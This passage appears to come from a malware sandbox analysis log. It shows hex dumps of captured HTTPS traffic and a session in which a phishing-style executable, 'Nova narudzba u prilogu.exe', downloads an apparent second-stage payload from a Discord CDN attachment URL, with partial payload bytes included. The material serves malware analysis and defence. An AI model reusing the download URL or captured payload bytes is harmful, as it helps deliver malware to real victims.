              Data Ascii: &+nwdi`#m$U!}v~v'=c|g5bYNyHmq~#P`w~mfbhSC]R^\o:gD0ErV_C|;wt8dV,niN/Gf0XzHt>x?#Z[3qDsvlj{=C@Xk
              2022-01-14 10:25:30 UTC34INData Raw: 60 a5 1e 64 a2 35 ba 1d 27 f8 6c b2 1e 24 16 0b ae 41 d9 74 e2 a5 99 61 43 9d 7b ab f9 83 eb 2e bb 7f e7 d6 2f d9 ff 7c fd 57 c0 ee 9e 25 36 eb 2f b7 8d d3 3a 46 96 1e 0e 35 e9 64 b0 b2 a1 a9 a1 00 35 d8 d5 40 f1 88 6a b4 c9 cc bc 3c b4 68 7d f2 6f 37 86 95 2c 0e 64 a1 b9 01 53 19 ae 9a 10 37 e3 28 fd 42 02 8a dd ba 95 ab 83 7b de a2 2f 63 a4 58 11 67 77 46 0c 8a 43 8e 4e f4 1f 83 f3 b5 c9 0f a3 cd 54 95 6e ab 8c a8 85 98 3f 93 83 27 c6 e2 64 2e 43 44 de e5 dd d6 79 39 82 6b 33 d8 ee e7 4d b0 58 8c 12 76 25 64 a3 b1 41 28 4a 90 4f e3 f3 fd e6 2a 9b b7 02 31 ee 18 80 9b f8 79 1a 4f 0e 29 d2 90 c9 10 24 3d 9b a8 85 f4 61 87 49 0f 95 d6 d9 eb 12 65 fc f1 6f e1 8b ba 9f 53 0a 9b 4a 17 1c 5b 4e fb 73 1b d1 51 a3 6c f5 f2 69 28 39 85 bc 2d 52 5c 1b c4 7a 9f 0b
              Data Ascii: `d5'l$AtaC{./|W%6/:F5d5@j<h}o7,dS7(B{/cXgwFCNTn?'d.CDy9k3MXv%dA(JO*1yO)$=aIeoSJ[NsQli(9-R\z
              2022-01-14 10:25:30 UTC36INData Raw: dc b8 0a f3 16 17 e5 69 28 ba c9 4b 68 00 39 f5 bf 73 03 f5 3f 90 be 44 1c 59 40 10 3c 16 64 ae 11 96 42 a8 59 4c f5 18 99 fb fe 6e b1 f8 92 a7 bf 6f 3f 90 3c 17 9c 4a e1 35 13 7a fa c1 a8 3f 99 d3 ba b3 5a cd b7 49 71 1e 44 17 91 9f d6 a5 1a c4 e6 8c aa c0 83 80 6b d5 e4 8f c7 9f 23 ae d8 2c 66 c0 6e 6e a6 63 6b 09 0f 94 b0 d9 5b 9d 47 27 d0 d7 27 62 b2 eb e0 33 b2 0c 74 ee 6c 68 aa 6e a1 86 4e e6 92 92 f1 74 21 5c 89 f3 4f 5b 1d 6e 56 1a 44 6d 5e c2 55 7c 91 c1 da 18 01 40 c2 d2 95 a5 c7 d9 b0 31 bb 54 ad 1b 59 ca 3b 50 f4 bc 3f cd 46 fa 73 8c 66 f0 09 fb 2e bf 70 07 0c fd 37 d7 93 dd 37 9a 57 0b 07 32 6d 84 b2 74 f4 fd f1 4c 10 a8 89 d4 f9 d9 09 35 86 4d 5e fa 4b 5f 78 aa 3a 3d e8 75 05 e7 a8 43 cd f9 ec 9c 2a 5e c2 08 25 c0 ec f5 ec ee e8 83 e8 25 6b
              Data Ascii: i(Kh9s?DY@<dBYLno?<J5z?ZIqDk#,fnnck[G''b3tlhnNt!\O[nVDm^U|@1TY;P?Fsf.p77W2mtL5M^K_x:=uC*^%%k
              2022-01-14 10:25:30 UTC37INData Raw: 65 fe 69 d2 7d 10 e1 8b f2 69 84 62 7e 2a 91 cb 4c ef ed 4b 63 db 95 ab 6f f6 ba b2 f0 44 07 f4 c7 4f fd db 2c c3 46 01 66 ba 14 32 2f a1 84 a5 9b 42 32 85 54 c6 8e 71 e0 d1 4f 7a 88 73 bc 6c 0a 8d dd 39 7e 4a e1 c7 ea 98 a2 af f4 8c b0 ac 51 8a 18 69 81 df 39 5f d6 a5 5c e3 dd 72 8a 92 87 f1 c4 f7 87 8a 95 d8 a1 bb 70 01 7d 0c 63 22 df b9 6b d5 68 3e 2a f5 d0 c8 d3 57 f3 5a 78 83 e0 b6 e5 46 f5 54 fe 68 59 2d b1 63 a2 58 39 97 e6 d6 5d 10 7d e7 41 80 eb 9b d5 ad bf ff c5 ed 24 5e cb 43 25 60 6e b4 1e 43 61 38 13 0a 78 fd 08 80 40 44 90 60 d5 bc e2 27 50 12 b2 03 f6 ce d9 ba 6d c5 10 61 d9 a3 ba ea b2 08 6e 3d 37 84 6c a6 d1 8f de 07 2d a3 45 c9 45 8f dd 1c 0f 12 1b ca 38 50 fb 13 56 c5 87 2a 24 e7 b4 19 0f c2 6f 98 5a 1e f3 ff 6c 88 6d 8e 50 27 67 91 c0
              Data Ascii: ei}ib~*LKcoDO,Ff2/B2TqOzsl9~JQi9_\rp}c"kh>*WZxFThY-cX9]}A$^C%`nCa8x@D`'Pman=7l-EE8PV*$oZlmP'g
              2022-01-14 10:25:30 UTC38INData Raw: 48 5a dd 3c 74 b2 6d bd 05 67 94 a9 d9 22 2d 13 a9 c6 ff 80 e1 4d 16 6b e7 2e 4c 7e 98 55 5f 6b 38 33 d0 e7 7d 98 24 23 65 c4 9e 2d d6 24 2c 59 42 ba df 9b ba 66 c7 3a 85 0b 9d ae d1 e7 0e bc 63 25 7f dc 65 cf a9 ca b6 b6 2b 66 ec f2 e8 23 18 ca d8 a0 da fc ab 3a aa f6 03 a6 15 b3 e7 63 95 bf f7 3e 22 57 44 37 74 eb 29 1f 33 c3 6c 07 b1 91 56 c3 bd 11 57 2c bf 01 b4 df a0 31 18 50 f8 de 89 ee 1f d8 ad ed 3e 70 38 61 33 0f 18 0d f5 9e a3 1a ce d3 8d fe 01 72 38 66 50 70 7a fb fb 22 ef 10 d7 21 70 26 d9 25 db e9 ae 6c e6 de 2c 76 7b 24 0b 61 4e 17 de 0d 31 30 e4 1a a1 31 9e d6 f3 ed 74 68 b8 b0 0d e4 85 e3 3f 63 85 8b 93 74 54 cf 58 da bd cc 18 a3 18 c8 65 3d 86 72 95 7b b2 b5 37 41 30 45 65 2f a7 14 d9 8a dc 23 0d 8a 68 bb 74 22 8d 6b 97 6d e1 52 f4 7b 0f
              Data Ascii: HZ<tmg"-Mk.L~U_k83}$#e-$,YBf:c%e+f#:c>"WD7t)3lVW,1P>p8a3r8fPpz"!p&%l,v{$aN101th?ctTXe=r{7A0Ee/#ht"kmR{
              2022-01-14 10:25:30 UTC40INData Raw: d6 c5 3c c2 14 b9 15 98 40 1f 36 ce 28 24 53 60 de 48 8a e8 9a 9d 5f a7 b2 11 fb fe 14 c9 52 81 5e 2d 3d 94 59 59 48 87 7d e1 22 5b 45 65 3b ad 7f 19 fb fc 72 92 2d 23 34 a2 29 a9 ae 1e 3f 29 89 0d 19 92 5f 52 ff ed eb 48 e1 44 9e 5e 2f 56 54 d0 d9 24 56 b2 a9 e2 a1 4a 98 3a b7 63 b3 90 43 91 de b7 e4 59 3b 37 a3 56 39 eb 1b cc d8 b2 8f e5 e6 5c 15 e4 54 1e 35 f1 f5 be a0 69 ce f4 3f 14 fb 7f ea 16 cf 7f 96 40 19 81 0c 74 f6 8f 86 10 c5 b2 47 75 56 d9 b4 ae 5f 07 ae dd fc 2d aa 4f 19 9e 36 fe 75 02 85 3a be ed 90 e6 c5 7f eb 0e 79 90 4c e8 93 c3 34 77 bd 09 e3 3b 59 9d c8 c6 b1 c8 bd 8f 8c 0b 40 80 31 ae 4a 82 ba 74 c0 ed 5c 0c 05 41 6a 23 ab 36 3c 08 9f a8 f7 b4 60 06 57 04 8f 8d 4f 90 eb 4d 8c 0b 13 5e 4d 06 9a 01 5a 63 84 1d ab 70 55 10 2a 4f 71 52 85
              Data Ascii: <@6($S`H_R^-=YYH}"[Ee;r-#4)?)_RHD^/VT$VJ:cCY;7V9\T5i?@tGuV_-O6u:yL4w;Y@1Jt\Aj#6<`WOM^MZcpU*OqR
              2022-01-14 10:25:30 UTC41INData Raw: 3e 68 ca 1e fa cb 44 1f c5 00 73 4c f0 ff 9d bd 54 ca cd 53 02 85 e4 8f db 33 6a d8 45 bf 1d b3 e7 1f a5 b4 0e 66 7a 18 14 21 28 1c 06 29 2e 87 3e c2 89 09 0c bd 68 d3 39 88 71 48 e2 cc d7 26 af 53 5a d8 a9 a3 fb f5 8d 77 a2 11 f3 ef 0a 97 ce 9a 55 4e e4 1b e2 fb f6 67 34 38 63 c5 80 68 aa 08 84 08 c1 9a af 95 db 2c 21 d2 a0 2f bb 65 f6 e1 40 58 c1 1a 46 f2 61 ed 7b 03 16 a5 04 97 af 6b 9b f4 7a 88 67 53 78 15 42 1d c1 99 77 78 3a 8c 02 73 d2 e6 90 4e e0 6b 08 c6 83 fd f1 e3 e8 83 3e 6b bc 92 a6 98 29 ba a7 b2 6c 36 4f 10 9d e4 fb 85 ae f2 98 d9 36 3c 1d b2 f4 2f ae 63 44 17 90 56 c3 67 cb 86 01 d5 eb 67 52 56 c6 f7 a3 d7 39 50 e5 08 84 b2 74 72 51 19 9e 49 6f 6a b5 90 47 b0 88 0a c4 a2 6a 4a cd 1e fd 1f 33 b3 87 e6 97 b2 18 d3 2d a1 ae a5 04 f8 c3 71 65
              Data Ascii: >hDsLTS3jEfz!().>h9qH&SZwUNg48ch,!/e@XFa{kzgSxBwx:sNk>k)l6O6</cDVggRV9PtrQIojGjJ3-qe
              2022-01-14 10:25:30 UTC42INData Raw: 2d a3 52 a1 b4 e5 5e f1 ee c2 e8 7c ce dc 5b bd f9 e5 11 e3 22 b3 d2 d4 c4 28 a4 53 ab 30 57 e6 42 0a 86 6b 5b 41 f7 03 e2 67 3f fb 11 97 32 50 bf 6f 52 19 21 5b e3 f6 d6 a7 a6 4e 48 3d 3a 6f ca 96 39 36 95 57 86 c3 40 65 e7 d0 66 47 8c a2 86 c3 dc 15 88 12 7d 02 00 52 1f 4d 02 92 68 fb 12 2f 07 99 74 39 a1 c0 16 86 c5 da 1b 1a ed 6b 4d 26 b7 de 08 89 92 a4 9d 10 08 33 86 71 07 0c 9b bb 6a 59 d3 a0 81 e7 60 5c b9 6b 2c 35 ee 76 2e 98 a3 2c a2 cf 86 05 c8 dc d6 59 fb 00 1d 3a 87 cd bc 21 d2 26 fe 02 74 52 df 4c 1a 24 9d 44 c4 9b db 07 c4 aa 10 06 40 cd 4d 6b 34 c1 0e 6a 43 43 f5 03 90 f2 14 6d 3a 12 3d 7d b0 84 8a e8 30 cb e1 24 3f 0c 7c e4 78 51 84 fa 98 88 4b 9d 6b 28 c6 57 32 d1 80 53 18 8c 12 fd 08 39 f4 68 91 2a 8d c9 a5 c4 20 19 ec c5 d7 d6 d4 ce b5
              Data Ascii: -R^|["(S0WBk[Ag?2PoR![NH=:o96W@efG}RMh/t9kM&3qjY`\k,5v.,Y:!&tRL$D@Mk4jCCm:=}0$?|xQKk(W2S9h*
              2022-01-14 10:25:30 UTC44INData Raw: 2a d7 38 d5 49 00 e5 e6 dd 52 9b 4b 7e c1 88 bb 13 1b 6d e6 85 e4 9f 4f 2c 2e cc 97 d0 31 e0 a0 d6 e7 02 74 2e 26 8b fa 71 5e c3 a9 b8 15 a9 2b f4 61 55 3b 94 1b df 5b 55 47 77 d6 a7 b4 17 03 1a 97 65 4d 64 65 22 22 4a f4 2e 52 1c 1a 85 ea 11 f1 98 5e bf 61 5d 1d c7 b8 c5 77 fb 16 e0 bf 7d 63 2c c0 98 4e 0b 3a a1 b5 82 60 b2 ea d3 3d 9e 94 b7 30 39 f5 04 ee 6c cb 49 05 e8 2b a7 59 90 59 23 a6 4e f2 28 e8 91 ce 0b 64 dd e2 34 6f 98 a1 77 6c f8 c4 aa 07 58 d1 a9 d4 c7 20 b8 64 e5 06 d2 d3 00 85 12 b1 9d df cf f3 f6 08 f5 9b c5 c5 4c f6 6b 9f 24 c0 54 45 f0 52 19 29 ae e3 4b 17 93 b6 1f eb 3d 82 66 59 93 c0 9f c1 65 57 60 c3 6f e7 8f a2 79 4a 28 ad dd c7 7b 41 2c db 8b f0 5a cf a3 9e 8b ee d1 32 c0 00 8a 6b 2b bd 16 66 1e 43 92 40 ef 05 7a 41 34 87 ef cd 5d
              Data Ascii: *8IRK~mO,.1t.&q^+aU;[UGweMde""J.R^a]w}c,N:`=09lI+YY#N(d4owlX dLk$TER)K=fYeW`oyJ({A,Z2k+fC@zA4]
              2022-01-14 10:25:30 UTC45INData Raw: 1e 2c 44 76 e9 19 58 f3 e7 0b 3a 8b 9e df 4a e2 c5 1e 29 ba e8 b5 81 e7 ed c9 3b e8 f4 65 72 bd 72 9f 59 e9 09 79 62 bf 28 02 93 d1 ad 5c a2 fd 46 96 80 67 64 ad 3e 13 15 16 8a 9c 83 20 23 c1 2b d1 a0 c2 30 4e fd f9 8b 8e 55 76 3e 06 99 0b 59 3e 5b 0c 2c cc f4 27 6a 32 90 f5 b8 7a e5 8a d7 d6 55 6a 15 39 4a 9d 59 50 57 4f 80 7b 05 10 1e ac 5d 31 65 97 de ce cc d7 21 96 2b 25 d9 2a 21 c1 22 ae 22 03 ba a4 f2 d9 78 8b fd e0 a6 54 3f 7e 0d f2 60 da c1 27 2e fb 38 02 82 61 58 b8 06 94 48 aa ca 3a fe a2 32 23 cb 00 82 1a 47 7c 83 f2 7a d3 c9 aa d6 a5 b9 77 01 40 0e 03 1c 50 f1 03 00 3b db 34 38 1e dc 15 02 a3 e7 95 8b 06 6b ee 90 55 49 06 6a 6b e0 da ef e1 c9 4f 76 9b cf 0a 65 fe a0 32 0f f2 6b 25 98 45 25 dc 5f 24 83 8c 02 9d 73 10 63 3e c4 40 b5 6a 66 67 2e
              Data Ascii: ,DvX:J);errYyb(\Fgd> #+0NUv>Y>[,'j2zUj9JYPWO{]1e!+%*!""xT?~`'.8aXH:2#G|zw@P;48kUIjkOve2k%E%_$sc>@jfg.
              2022-01-14 10:25:30 UTC46INData Raw: fb 7a aa 01 03 eb b3 97 b6 04 25 c3 77 0c 9c 8e 50 13 96 22 4e 79 68 c7 3b 88 c8 c3 65 27 20 e6 90 26 3a 0b e3 07 15 ef b7 24 98 eb 08 9a 47 60 88 81 de f0 15 33 b3 85 48 5b 26 70 91 24 35 40 09 bf 72 e2 b2 1c 5f 22 cf e3 6b 32 35 b9 6b 5f b7 69 0a 9b d3 59 37 d5 a3 1e 63 39 80 6b 3f 9f bb 76 82 9a 1f b2 72 87 ba fc 7c 99 da 27 ad 7e 6f 0d e8 97 c0 93 a8 3e 5a dc ad 82 36 22 49 62 ae e5 aa 3e 05 1c 51 1d 3c a2 1e 2f b1 df 3e 13 f4 80 ba 97 86 77 40 0f a0 26 1d cb b9 ce c3 13 05 bc 80 93 aa 39 7a ed 05 ec f4 1b ac 7f 82 e2 61 40 7e 85 f7 e8 0c bf 68 a4 2c 20 4e 71 a1 a3 17 e5 1f cc 7a 3c 05 18 64 bc e7 be 47 64 a0 35 a5 bf 6a f8 54 c3 67 e1 05 cc 42 bb b2 aa 7e 71 80 33 48 52 1e 6c ea 32 4b 8e 24 c0 4c 5a b4 eb 1e 9f ba 97 d6 ba e2 7f 66 e9 1a 59 50 fa 00
              Data Ascii: z%wP"Nyh;e' &:$G`3H[&p$5@r_"k25k_iY7c9k?vr|'~o>Z6"Ib>Q</>w@&9za@~h, Nqz<dGd5jTgB~q3HRl2K$LZfYP
              2022-01-14 10:25:30 UTC48INData Raw: ef 71 19 bd 7a 9d a6 97 6b 21 21 24 89 f2 71 0c 69 53 1b d6 e5 24 49 7e d0 b8 07 0c 61 b2 bc f3 e4 91 cf 33 55 9f cb 21 a9 ba 62 ae 0b ee 67 53 1e 26 36 29 42 22 4c e8 53 f7 7f ad 87 1e e6 83 eb 01 02 c1 00 e8 96 98 4d 78 96 f8 db 2a d6 55 9b dd 2f a1 b9 1e 2b ad eb 3b 8e 4f 26 35 af 91 c0 14 98 45 6f 22 5d 34 da 0a e9 76 f7 f0 cd 59 5c c3 8f 10 0f 8f 93 d1 ae 6e c6 86 15 ec e5 18 7c 93 38 af f5 9f dd 23 77 2e 29 ba 4a 5e 4e bb 85 d1 07 ae 4b 6c 43 61 5d 50 f7 ed 41 e4 e8 90 70 9f ae 09 ca 77 19 18 98 ff e8 9c 30 20 26 23 d7 99 e2 a1 a3 66 1f a5 fd 96 4d 75 01 f5 4b 70 82 65 24 2f 4e 53 02 e5 6b 33 d3 4d 73 0d 1c 2a 50 86 39 88 8a d8 d8 c7 35 a4 b3 94 4e e2 11 57 2a ba 52 a4 4c fa 7a 86 3c 97 25 24 5a db 21 db 54 d3 f4 74 8f d6 a6 89 86 84 bd 37 f4 63 38
              Data Ascii: qzk!!$qiS$I~a3U!bgS&6)B"LSMx*U/+;O&5Eo"]4vY\n|8#w.)J^NKlCa]PApw0 &#fMuKpe$/NSk3Ms*P95NW*RLz<%$Z!Tt7c8
              2022-01-14 10:25:30 UTC49INData Raw: 57 b2 a5 50 da ff 4d 86 e6 86 3b b6 78 78 97 77 11 82 7b 06 88 19 34 b2 55 5e c8 c3 72 e6 61 a2 a0 3c 06 90 26 12 88 a9 3e 10 7d 10 69 fa 58 c5 62 a4 bb 1d cd 4d 19 ee 8b e1 34 39 79 54 ba 46 57 3e e2 65 16 ab 8d c2 f1 2e 24 53 75 fb 53 75 a5 08 e5 d9 cf 53 7a 8d 66 40 e4 7e 75 73 da 0f e4 87 f7 bd 26 8a 04 6e 66 82 63 3d 9d 5a 75 ef 62 b0 14 69 d2 4d 6a bd 93 3e ed 75 13 f9 81 bf 72 d1 49 0a de ac 6f 92 5b 56 94 90 21 2a f4 da d2 de a8 23 04 04 92 47 0e 9f 74 66 de b6 17 bb 76 cb 48 9f f5 e3 b1 4c f0 98 1e 91 ac ed bb e7 78 8b e2 a7 fd 6e a0 20 aa f7 0f 84 6a a9 64 2f 64 c4 b4 1b 89 fc 0d a5 a2 5c 01 07 12 c2 7e e1 95 59 cb 34 2b b9 67 d8 0f 53 05 1a 40 6d 9e 29 aa 07 0f 38 b8 96 23 cf 50 eb 71 ad 8c 79 06 90 9a e7 7a 3b 92 5a d7 2d d7 76 ec 6c c1 5e ba
              Data Ascii: WPM;xxw{4U^ra<&>}iXbM49yTFW>e.$SuSuSzf@~us&nfc=ZubiMj>urIo[V!*#GtfvHLxn jd/d\~Y4+gS@m)8#Pqyz;Z-vl^
              2022-01-14 10:25:30 UTC50INData Raw: ca a9 cd a2 59 d0 58 e0 05 01 9e 57 ab 7e 14 1b 97 be b7 86 91 b3 72 00 98 ec 87 66 3a b8 66 42 1a f5 b9 41 ff 99 e7 42 de e7 9f b7 7f 8e 79 1b 10 f3 d8 35 da 84 29 ab dd 95 b0 a9 57 26 f8 ba 1f b6 2c 27 3b 74 77 f5 11 05 40 49 3b 7a a9 e2 3c 2e 0b 9b 22 5d a8 97 a1 55 9c 5f 2d eb 8a 6e 10 7e e4 d7 7a 6c ed 77 4b 05 f3 1f 4d d5 41 87 92 b9 8f e0 6b 29 a7 db 30 4e da a8 38 82 be 51 df 3b 8c 61 4c fa 68 49 ba 5b 85 ec 92 ef 92 2d ef 14 80 96 75 a5 b6 11 8f 30 d0 70 ab 1d cf 54 a6 89 f5 e3 2c 33 b0 cb 6f 23 cb e6 5b ee 4f 79 08 89 bc ef 7d 1d e0 b5 8c 74 52 48 8a 9c 99 87 a0 6d f9 45 6d 4f 3e 7a 70 da dc e0 cb be 4c 43 46 ed 16 1d 33 47 57 d7 22 59 21 d3 af 56 cc ae 46 27 21 9d d0 8f b1 75 f3 11 3a 10 68 c8 25 7a a7 11 ea 9c 47 72 bd 4e f2 64 1d 1a c3 af 8c
              Data Ascii: YXW~rf:fBABy5)W&,';tw@I;z<."]U_-n~zlwKMAk)0N8Q;aLhI[-u0pT,3o#[Oy}tRHmEmO>zpLCF3GW"Y!VF'!u:h%zGrNd
              2022-01-14 10:25:30 UTC52INData Raw: c8 f1 1b c8 c2 22 5a 31 4c 0b 1d a5 1a 60 de b9 7f 4f f6 1b bb 7c 94 53 12 ba df 36 26 5d 4f 8b c2 ff fe ae a3 13 9f a4 2a 59 e2 0b eb 1f d2 3f e8 84 93 88 07 55 28 df e9 06 9c 28 2f c3 11 12 93 eb 0e 78 9e 3f af b5 97 dd 70 8a 94 b3 84 6f 31 b6 60 22 e9 46 44 0f e0 2c 02 d3 33 fe 8c 85 92 4b 66 bd 68 38 27 d2 d5 19 f5 e9 20 5e df 96 d8 c3 a1 be 88 39 cf 1c 9a 27 50 27 f9 44 03 10 75 0b f8 6a 46 6d dd 4a f2 71 1a 68 ec 8d c4 9c c1 a1 4c 96 56 ca 86 73 40 1f a6 6a a6 c4 af 86 71 a9 0e 16 80 b0 b6 64 a8 25 02 0c 3f 00 70 64 5c ab 93 d5 0d 31 d3 14 cc 91 cf 02 86 0d a0 32 64 ed 15 fd 1a 50 24 ef 63 fa 7b 42 76 cc d6 fb f4 02 84 fd 85 e2 a2 fb 46 e8 e9 40 07 53 75 03 21 82 dd 3e 1a 5b 53 32 d3 64 e6 31 f6 fe c7 14 8d fd a0 a8 ee d5 91 0b f5 1c 30 c8 de 1d cf
              Data Ascii: "Z1L`O|S6&]O*Y?U((/x?po1`"FD,3Kfh8' ^9'P'DujFmJqhLVs@jqd%?pd\12dP$c{BvF@Su!>[S2d10
              2022-01-14 10:25:30 UTC53INData Raw: 24 26 59 41 d7 44 43 64 0e aa 7d 1d cc 94 f5 ea 97 d4 cc 8f 9c e1 70 60 0d 7f 99 c1 79 54 72 85 ff fa 6a e4 c0 7f b1 ca 59 fd af cc 42 7c 1a c1 2d c8 27 da c7 a6 63 5c 00 05 81 98 55 5a c8 83 41 62 73 3c 04 9a 5a 63 99 b8 71 09 01 08 ce 16 d2 5b 37 e9 09 15 fd 4c 5f 96 3f 8b f2 79 0d f9 ec c4 8b 07 f5 27 ab 99 c7 21 a4 36 e0 b9 6d 39 2a e5 67 57 55 2d a0 3e 1c 94 8f d0 0a 29 66 dc a9 a6 25 95 74 17 43 ac 1c 44 1e 5a 92 28 48 f6 be e2 ba eb c1 ce d5 31 b2 a3 b6 15 fe ac b4 12 be 20 20 54 95 47 08 9f a3 a6 33 ae a3 08 81 47 d8 65 5e c1 72 85 b3 fb b2 10 39 ee 64 5e 4e 97 d5 45 06 f9 f8 0b b1 8c 70 58 7c e0 48 4c 36 4b 6c b3 f5 fe 11 a9 b7 98 86 fc 6d 69 6c 39 19 81 99 6b 3f 83 e3 26 e0 d7 2f 6d 98 50 cc 3b f9 17 56 b2 ee 84 c8 d0 b7 fe e1 8c 2e f5 80 94 ef
              Data Ascii: $&YADCd}p`yTrjYB|-'c\UZAbs<Zcq[7L_?y'!6m9*gWU->)f%tCDZ(H1 TG3Ge^r9d^NEpX|HL6Klmil9k?&/mP;V.


              Session IDSource IPSource PortDestination IPDestination PortProcess
              1192.168.2.449775162.159.135.233443C:\Users\user\Desktop\Nova narudzba u prilogu.exe
              TimestampkBytes transferredDirectionData
              2022-01-14 10:25:31 UTC57OUTGET /attachments/909752051695775778/931434691809124392/Ajshkennychvrlvyqvxklxbhfqfzgvr HTTP/1.1
              User-Agent: 88
              Host: cdn.discordapp.com
              Cache-Control: no-cache
              2022-01-14 10:25:31 UTC57INHTTP/1.1 200 OK
              Date: Fri, 14 Jan 2022 10:25:31 GMT
              Content-Type: application/octet-stream
              Content-Length: 466432
              Connection: close
              CF-Ray: 6cd629297d925b3e-FRA
              Accept-Ranges: bytes
              Age: 7898
              Cache-Control: public, max-age=31536000
              Content-Disposition: attachment;%20filename=Ajshkennychvrlvyqvxklxbhfqfzgvr
              ETag: "160f746c3471a01d756cd5438ae7899d"
              Expires: Sat, 14 Jan 2023 10:25:31 GMT
              Last-Modified: Fri, 14 Jan 2022 06:28:55 GMT
              Vary: Accept-Encoding
              CF-Cache-Status: HIT
              Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
              Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
              x-goog-generation: 1642141735792380
              x-goog-hash: crc32c=BMufiQ==
              x-goog-hash: md5=Fg90bDRxoB11bNVDiueJnQ==
              x-goog-metageneration: 1
              x-goog-storage-class: STANDARD
              x-goog-stored-content-encoding: identity
              x-goog-stored-content-length: 466432
              X-GUploader-UploadID: ADPycdvgVw86lNODc_FUvxJ5vBPBPwu7yWNJ-fM7Bf9Y4Jwa0j518QQwomxRFtc2-ZlqlgwH5n6LpEXFuy97oIiXV5o
              X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
              2022-01-14 10:25:31 UTC59INData Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 33 3f 73 3d 71 78 7a 69 34 41 57 39 76 73 70 4e 53 48 52 56 76 53 42 6a 47 69 7a 4d 72 36 68 4a 74 62 65 32 59 59 75 39 50 64 72 51 43 6e 75 30 6d 74 35 50 62 59 52 6b 25 32 46 6e 45 69 56 25 32 42 74 34 4f 73 47 4f 45 74 25 32 42 64 4b 37 75 58 4e 73 6c 78 64 37 61 59 41 6d 76 50 47 64 59 32 42 39 4c 31 38 5a 4e 45 71 71 39 36 79 6f 72 63 78 70 39 61 64 74 35 4d 6e 56 67 79 4b 72 32 72 6f 47 39 43 31 59 75 57 4c 78 44 71 61 41 25 33 44 25 33 44 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a
              Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=qxzi4AW9vspNSHRVvSBjGizMr6hJtbe2YYu9PdrQCnu0mt5PbYRk%2FnEiV%2Bt4OsGOEt%2BdK7uXNslxd7aYAmvPGdY2B9L18ZNEqq96yorcxp9adt5MnVgyKr2roG9C1YuWLxDqaA%3D%3D"}],"group":"cf-nel","max_age":
              2022-01-14 10:25:31 UTC59INData Raw: 18 da 04 39 22 f7 4a 5b f6 c6 57 ec 36 9e 95 6a 0a 39 28 89 53 db 8c ce 77 a1 05 b7 39 27 6e 03 b6 bc 46 4a 4f d3 fa c1 d4 73 af 2f 14 d5 ef a1 14 d3 f5 4f d3 ff 5d e6 22 fd 51 df 91 68 1e f2 d8 01 a4 9a f9 4b cf e2 1b 6d 90 e2 18 dc 1f 74 30 95 7c 33 1d 6c 16 c8 64 0b 49 cd ea 2f 00 30 8a de 1d 61 fa d5 fe ca 60 72 2d 0f 4d d3 eb a8 84 cb e7 ae ad 23 74 38 a3 1f 65 83 4e 55 f4 dc 17 5d f8 c4 5e 7c 3b 3a af 25 73 a2 8a d8 16 c0 49 ce 7e 36 9b 7b b9 d1 f1 b3 3d 2b 03 af 3b 32 8e e5 ad 2e 89 53 de 03 a9 10 c2 51 df 94 ff 44 a6 90 e8 20 ea 2a 84 dc 08 37 28 84 c8 62 11 55 fc d1 f8 c4 5e 7c 3b 3a af 25 73 a2 8a d8 16 c0 49 ce 7e 36 9b 7b b9 d1 f2 c1 c3 f5 63 a2 a1 1c f4 d7 a2 aa b2 a1 23 67 fc a6 8f 73 bf da 65 93 7e 2d 24 92 9b 0f 7f 53 f0 2b 62 6b b1 1f 78
              Data Ascii: 9"J[W6j9(Sw9'nFJOs/O]"QhKmt0|3ldI/0a`r-M#t8eNU]^|;:%sI~6{=+;2.SQD *7(bU^|;:%sI~6{c#gse~-$S+bkx
              2022-01-14 10:25:31 UTC60INData Raw: 86 62 a6 38 14 7b 1e 4e fa 76 96 4e f3 e8 8a 7a 88 67 28 25 ca c0 e0 a1 a9 b8 05 0b ef 1b c6 e6 98 40 1e 45 71 1f d2 c6 fe 62 a6 3e 00 98 5f 43 8d c0 f3 e4 9e 21 d6 b9 66 ad 9d a1 a0 20 4d 7f eb 1b c6 f2 6a a2 23 d4 c4 ff e1 3b 8e 42 19 f2 79 16 69 28 26 5f 40 0c 61 4f 6f 26 56 d9 21 d1 47 63 38 0e 78 8d c0 f4 69 31 bf 76 94 40 18 73 0b e5 1c 5e d2 c4 e8 8e 43 8c 60 da a7 a7 be ea 87 f2 67 3e 1e 40 12 77 0c 61 50 f2 7a 94 5d 48 fd e5 05 01 0f e7 0c 60 c4 fc 66 b1 99 c2 ec 8f c7 50 f8 6c ab 99 d5 44 03 0d f6 75 15 e9 0f e6 9d a7 a5 a9 bb 67 29 b9 63 21 d5 4f 79 12 61 50 ff e4 93 c7 59 51 7f f9 f1 1f cc db 35 a7 b6 12 66 aa 09 1b c0 fb f2 69 2e 2b ac 04 97 d0 d2 d9 2b a2 3c 16 69 32 3c 12 71 1f c7 58 d0 da b6 09 1b c6 fd e1 3b 8b e0 bd 60 de aa 1e 44 13 fe
              Data Ascii: b8{NvNzg(%@Eqb>_C!f Mj#;Byi(&_@aOo&V!Gc8xi1v@s^C`g>@waPz]H`fPlDug)c!OyaPYQ5fi.++<i2<qX;`D
